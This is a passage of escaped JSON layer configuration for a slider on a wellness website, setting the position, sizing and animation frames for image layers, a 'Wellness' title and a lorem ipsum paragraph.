To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":7770,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"6\":{\"text\":\"Image 6\",\"alias\":\"Towel\",\"uid\":6,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h4-slide1-graphic4.png\",\"imageId\":3315},\"size\":{\"width\":{\"d\":{\"v\":\"600px\",\"e\":true},\"n\":{\"v\":\"240px\",\"e\":true},\"t\":{\"v\":\"240px\"},\"m\":{\"v\":\"240px\"}},\"height\":{\"d\":{\"v\":\"355px\",\"e\":true},\"n\":{\"v\":\"142px\",\"e\":true},\"t\":{\"v\":\"142px\"},\"m\":{\"v\":\"142px\"}},\"originalWidth\":600,\"originalHeight\":355,\"aspectRatio\":{\"d\":{\"v\":1.6901408450704225},\"n\":{\"v\":1.6901408450704225},\"t\":{\"v\":1.6901408450704225},\"m\":{\"v\":1.6901408450704225}}},\"position\":{\"x\":{\"d\":{\"v\":\"1139px\",\"e\":true},\"n\":{\"v\":\"860px\",\"e\":true},\"t\":{\"v\":\"510px\",\"e\":true},\"m\":{\"v\":\"510px\"}},\"y\":{\"d\":{\"v\":\"88px\",\"e\":true},\"n\":{\"v\":\"101px\",\"e\":true},\"t\":{\"v\":\"207px\",\"e\":true},\"m\":{\"v\":\"207px\"}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\",\"e\":true},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"zIndex\":10,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"bottom\"},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"z\":0,\"scaleX\":\"2\",\"scaleY\":\"2\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":\"90deg\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":7500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"7\":{\"text\":\"Image 7\",\"alias\":\"Bochica\",\"uid\":7,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h4-slide1-graphic5.png\",\"imageId\":3316},\"size\":{\"width\":{\"d\":{\"v\":\"365px\",\"e\":true},\"n\":{\"v\":\"206px\",\"e\":true},\"t\":{\"v\":\"206px\",\"e\":true},\"m\":{\"v\":\"131px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"257px\",\"e\":true},\"n\":{\"v\":\"145px\",\"e\":true},\"t\":{\"v\":\"145px\",\"e\":true},\"m\":{\"v\":\"92px\",\"e\":true}},\"originalWidth\":365,\"originalHeight\":257,\"aspectRatio\":{\"d\":{\"v\":1.4202334630350195},\"n\":{\"v\":1.4202334630350195},\"t\":{\"v\":1.4202334630350195},\"m\":{\"v\":1.4202334630350195}}},\"position\":{\"x\":{\"d\":{\"v\":\"497px\",\"e\":true},\"n\":{\"v\":\"412px\",\"e\":true},\"t\":{\"v\":\"112px\",\"e\":true},\"m\":{\"v\":\"31px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-54px\",\"e\":true},\"n\":{\"v\":\"-15px\",\"e\":true},\"t\":{\"v\":\"50px\",\"e\":true},\"m\":{\"v\":\"21px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":11,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":7500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"9\":{\"text\":\"Wellness \",\"alias\":\"Title\",\"uid\":9,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"562px\",\"e\":true},\"n\":{\"v\":\"432px\",\"e\":true},\"t\":{\"v\":\"151px\",\"e\":true},\"m\":{\"v\":\"47px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"435px\",\"e\":true},\"n\":{\"v\":\"222px\",\"e\":true},\"t\":{\"v\":\"317px\",\"e\":true},\"m\":{\"v\":\"149px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":12,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":12,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#1f1f1f\",\"e\":true},\"n\":{\"v\":\"#1f1f1f\",\"e\":true},\"t\":{\"v\":\"#1f1f1f\"},\"m\":{\"v\":\"#1f1f1f\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"100px\",\"e\":true},\"n\":{\"v\":\"85px\",\"e\":true},\"t\":{\"v\":\"85px\"},\"m\":{\"v\":\"65px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\"},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"85px\",\"e\":true},\"n\":{\"v\":\"85px\",\"e\":true},\"t\":{\"v\":\"85px\"},\"m\":{\"v\":\"85px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#1f1f1f\",\"e\":true},\"n\":{\"v\":\"#1f1f1f\",\"e\":true},\"t\":{\"v\":\"#1f1f1f\"},\"m\":{\"v\":\"#1f1f1f\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"10\":{\"text\":\"Lorem ipsum dolor sit amet, in doctus voluptua mei. At sit nibh audire, eu qui legere alie.\",\"alias\":\"Paragraph\",\"uid\":10,\"size\":{\"width\":{\"d\":{\"v\":\"420px\",\"e\":true},\"n\":{\"v\":\"420px\",\"e\":true},\"t\":{\"v\":\"420px\"},\"m\":{\"v\":\"297px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"59px\",\"e\":true},\"n\":{\"v\":\"59px\",\"e\":true},\"t\":{\"v\":\"59px\"},\"m\":{\"v\":\"88px\",\"e\":true}},\"originalWidth\":\"420px\",\"originalHeight\":\"59px\"},\"position\":{\"x\":{\"d\":{\"v\":\"562px\",\"e\":true},\"n\":{\"v\":\"434px\",\"e\":true},\"t\":{\"v\":\"151px\",\"e\":true},\"m\":{\"v\":\"47px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"544px\",\"e\":true},\"n\":{\"v\":\"322px\",\"e\":true},\"t\":{\"v\":\"421px\",\"e\":true},\"m\":{\"v\":\"239px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":13,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":13,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#959595\",\"e\":true},\"n\":{\"v\":\"#959595\",\"e\":true},\"t\":{\"v\":\"#959595\"},\"m\":{\"v\":\"#959595\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"v\":\"20px\",\"e\":true},\"t\":{\"v\":\"20px\"},\"m\":{\"v\":\"16px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"30px\",\"e\":true},\"n\":{\"v\":\"30px\",\"e\":true},\"t\":{\"v\":\"30px\"},\"m\":{\"v\":\"29px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\"},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#959595\",\"e\":true},\"n\":{\"v\":\"#959595\",\"e\":true},\"t\":{\"v\":\"#959595\"},\"m\":{\"v\":\"#959595\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"s